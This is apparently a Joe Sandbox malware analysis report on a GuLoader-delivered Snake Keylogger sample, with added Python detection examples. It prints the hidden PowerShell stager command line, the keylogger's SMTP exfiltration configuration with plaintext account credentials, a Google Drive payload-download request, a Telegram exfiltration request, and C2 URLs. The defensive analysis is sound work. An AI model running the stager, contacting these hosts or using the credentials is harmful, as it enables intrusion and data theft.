Windows Analysis Report
Rundholterne89.exe

Overview

General Information

Sample name: Rundholterne89.exe
Analysis ID: 1539382
MD5: a1e239c4d5116e289ce0597a92844ede
SHA1: 4562d452ccc32512291c3165a0b9b3c076b28094
SHA256: 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904
Tags: exevipkeyloggeruser-malwarelabnet

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Rundholterne89.exe (PID: 7992 cmdline: "C:\Users\user\Desktop\Rundholterne89.exe" MD5: A1E239C4D5116E289CE0597A92844EDE)
    • powershell.exe (PID: 8084 cmdline: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6624 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
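The PowerShell command line in the process tree above is the hand-off from the sample to the next stage: it reads the dropped data file Exungulate.Spe205 as one string, takes three characters at offset 55438 as the name of a command (the name itself is not shown in the report) and dot-invokes that command on the whole file, so nothing in the command line says what gets executed. The Python below is an added example, not part of the Joe Sandbox report and not Joe Security's signature logic; it triages that command-line shape and runs over constructed process records whose field names (pid, parent, cmdline) are assumptions of the example.

```python
"""Added example, not part of the Joe Sandbox report: triage of the
PowerShell stager command line from the process tree above.

The detectable part is the shape of the invocation, not a cmdlet name:
hidden window + whole-file read of a data file + a command name computed
at runtime and dot-invoked with the file contents as its argument."""
import re

# -windowstyle hidden, or the parameter prefix PowerShell also accepts, -w hidden
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Get-Content -raw '<path>' : whole-file read of a non-script payload
READ_RAW_FILE = re.compile(r"Get-Content\s+-raw\s+'(?P<path>[^']+)'", re.I)
# $N=$B.SubString(off,len);.$N($B) : name sliced out of the blob, then dot-invoked on the blob
DYNAMIC_INVOKE = re.compile(
    r"\$(?P<name>\w+)\s*=\s*\$(?P<blob>\w+)\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\)\s*;"
    r"\s*\.\s*\$(?P=name)\s*\(\s*\$(?P=blob)\s*\)",
    re.I,
)

# Verbatim command line from the report's process tree (PID 8084).
SAMPLE_CMDLINE = r'''"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"'''
# Constructed benign control: a hidden window on its own is not enough to alert on.
BENIGN_CMDLINE = r'''"powershell.exe" -windowstyle hidden -File 'C:\Scripts\backup.ps1' '''


def triage_stager(cmdline: str) -> dict:
    """Indicators of the stager shape found in one command line."""
    out = {"hidden_window": bool(HIDDEN_WINDOW.search(cmdline)),
           "payload_file": None, "dynamic_invoke": False}
    m = READ_RAW_FILE.search(cmdline)
    if m:
        out["payload_file"] = m.group("path")
    m = DYNAMIC_INVOKE.search(cmdline)
    if m:
        out["dynamic_invoke"] = True
        out["cmdlet_offset"] = int(m.group("off"))   # 55438 in the report's sample
        out["cmdlet_length"] = int(m.group("len"))   # 3: a three-character command name
    return out


def is_stager(cmdline: str) -> bool:
    """All three indicators together; any one alone is common in legitimate scripts."""
    h = triage_stager(cmdline)
    return h["hidden_window"] and h["payload_file"] is not None and h["dynamic_invoke"]


def scan(records: list[dict]) -> list[dict]:
    """Flag process records whose command line matches; report pid, parent and payload path."""
    hits = []
    for r in records:
        if is_stager(r["cmdline"]):
            t = triage_stager(r["cmdline"])
            hits.append({"pid": r["pid"], "parent": r["parent"], "payload_file": t["payload_file"]})
    return hits


# Constructed records mirroring the report's process tree; parents not given
# in the report are marked unknown.
RECORDS = [
    {"pid": 7992, "parent": "unknown", "cmdline": r'"C:\Users\user\Desktop\Rundholterne89.exe"'},
    {"pid": 8084, "parent": "Rundholterne89.exe", "cmdline": SAMPLE_CMDLINE},
    {"pid": 4242, "parent": "unknown", "cmdline": BENIGN_CMDLINE},
]

if __name__ == "__main__":
    for hit in scan(RECORDS):
        print(hit)
```

The payload path the triage returns is the file to collect for analysis: the three characters at the reported offset name the command that runs, and the rest of the file is its argument.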
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Malware configuration (Snake Keylogger): {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 00000002.00000002.1886651504.000000000936D000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Source: Process Memory Space: msiexec.exe PID: 6624 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: Process Memory Space: msiexec.exe PID: 6624 | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security

          System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 142.250.185.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6624, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49709
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8084, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 213.165.67.118, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6624, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49729
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)", CommandLine: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Rundholterne89.exe", ParentImage: C:\Users\user\Desktop\Rundholterne89.exe, ParentProcessId: 7992, ParentProcessName: Rundholterne89.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)", ProcessId: 8084, ProcessName: powershell.exe
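The three Sigma matches above tell one story: PowerShell writes a PE into a deep AppData path, and msiexec.exe, a process that has no reason to be a network client, then connects to 142.250.185.174:443 and to 213.165.67.118:587 (SMTP submission). Below is an added example, not part of the Joe Sandbox report and not the Sigma rules themselves: simplified versions of the three detections as Python predicates run over constructed Sysmon-style events. Field names follow the event data quoted above; the mail-client allow-list and the extension list are assumptions of the example, and the published rules carry more filters than shown here.

```python
"""Added example, not part of the Joe Sandbox report: simplified forms of
the three matched Sigma rules as predicates over Sysmon-style events.
Field names (EventID, Image, Initiated, DestinationPort, TargetFilename,
ProcessId) follow the event data quoted in the report. MAIL_CLIENTS and
DROPPED_EXTENSIONS are assumptions of this example."""
from pathlib import PureWindowsPath

MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}          # assumed allow-list for SMTP
SMTP_PORTS = {25, 465, 587}
DROPPED_EXTENSIONS = {".exe", ".dll", ".scr", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta"}


def image_name(path: str) -> str:
    """Lower-case file name of an Image path, e.g. 'msiexec.exe'."""
    return PureWindowsPath(path).name.lower()


def msiexec_initiated_connection(ev: dict) -> bool:
    """Sysmon EventID 3 with msiexec.exe as the initiating image. The installer does
    not talk to 443 or 587 on its own; in this report it hosts injected keylogger code."""
    return (ev.get("EventID") == 3 and ev.get("Initiated") is True
            and image_name(ev.get("Image", "")) == "msiexec.exe")


def binary_dropper_via_powershell(ev: dict) -> bool:
    """Sysmon EventID 11 (FileCreate) from PowerShell targeting an executable or script extension."""
    return (ev.get("EventID") == 11
            and image_name(ev.get("Image", "")) in {"powershell.exe", "pwsh.exe"}
            and PureWindowsPath(ev.get("TargetFilename", "")).suffix.lower() in DROPPED_EXTENSIONS)


def suspicious_outbound_smtp(ev: dict) -> bool:
    """Outbound connection to an SMTP port from anything not on the mail-client allow-list."""
    return (ev.get("EventID") == 3 and ev.get("Initiated") is True
            and ev.get("DestinationPort") in SMTP_PORTS
            and image_name(ev.get("Image", "")) not in MAIL_CLIENTS)


RULES = {
    "Msiexec Initiated Connection": msiexec_initiated_connection,
    "Potential Binary Or Script Dropper Via PowerShell": binary_dropper_via_powershell,
    "Suspicious Outbound SMTP Connections": suspicious_outbound_smtp,
}


def evaluate(events: list[dict]) -> list[tuple]:
    """(rule name, ProcessId) for every rule that fires on every event, in event order."""
    return [(name, ev.get("ProcessId")) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed events: the three matches from the report plus two benign controls.
EVENTS = [
    {"EventID": 3, "Image": r"C:\Windows\SysWOW64\msiexec.exe", "ProcessId": 6624, "Initiated": True,
     "DestinationIp": "142.250.185.174", "DestinationPort": 443, "Protocol": "tcp"},
    {"EventID": 11, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "ProcessId": 8084,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe"},
    {"EventID": 3, "Image": r"C:\Windows\SysWOW64\msiexec.exe", "ProcessId": 6624, "Initiated": True,
     "DestinationIp": "213.165.67.118", "DestinationPort": 587, "Protocol": "tcp"},
    # benign controls (constructed): a mail client on 587, PowerShell writing a text file
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "ProcessId": 5100,
     "Initiated": True, "DestinationIp": "203.0.113.25", "DestinationPort": 587, "Protocol": "tcp"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ProcessId": 5200,
     "TargetFilename": r"C:\Users\user\Documents\report.txt"},
]

if __name__ == "__main__":
    for name, pid in evaluate(EVENTS):
        print(f"{name}: PID {pid}")
```

The 587 connection fires two rules at once, which is the useful property here: an SMTP alert on msiexec.exe points straight at the injected process rather than at a mail client that might simply be misconfigured.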
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T16:04:21.520222+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:22.954475+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49715 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:26.027860+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49719 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:28.905367+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49723 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:31.792925+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49727 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:19.358399+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:20.811576+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:22.249021+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:14.198153+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | TCP


          AV Detection

Source: Rundholterne89.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe | Avira: detection malicious, Label: TR/AVI.Inj.npwdo
Source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe | ReversingLabs: Detection: 42%
Source: Rundholterne89.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability

          Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Rundholterne89.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.10:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49728 version: TLS 1.2
Source: Rundholterne89.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1877824072.0000000006B74000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.1877824072.0000000006B74000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_00406033 FindFirstFileA,FindClose | 0_2_00406033
Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 0_2_004055D1
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 0031F45Dh | 6_2_0031F2C0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 0031F45Dh | 6_2_0031F4AC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 0031FC19h | 6_2_0031F974
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DF31E0h | 6_2_25DF2DC8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DF2C19h | 6_2_25DF2968
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DF0D0Dh | 6_2_25DF0B30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DF1697h | 6_2_25DF0B30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DF31E0h | 6_2_25DF2DBB
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFDC51h | 6_2_25DFD9A8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFD7F9h | 6_2_25DFD550
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DF31E0h | 6_2_25DF310E
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFD3A1h | 6_2_25DFD0F8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFCF49h | 6_2_25DFCCA0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 6_2_25DF0040
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFFAB9h | 6_2_25DFF810
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFF661h | 6_2_25DFF3B8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFF209h | 6_2_25DFEF60
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFEDB1h | 6_2_25DFEB08
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFE959h | 6_2_25DFE6B0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFE501h | 6_2_25DFE258
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 25DFE0A9h | 6_2_25DFDE00

          Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.10:49729 -> 213.165.67.118:587
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 193.122.130.0
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49714 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49709 -> 142.250.185.174:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49715 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49723 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49727 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49719 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49713 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: smtp.ionos.es
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 22 Oct 2024 14:04:32 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000006.00000002.2625379700.0000000023389000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.geotrust.com/GeoTrustTLSRSACAG1.crt0
Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cdp.geotrust.com/GeoTrustTLSRSACAG1.crl0v
Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
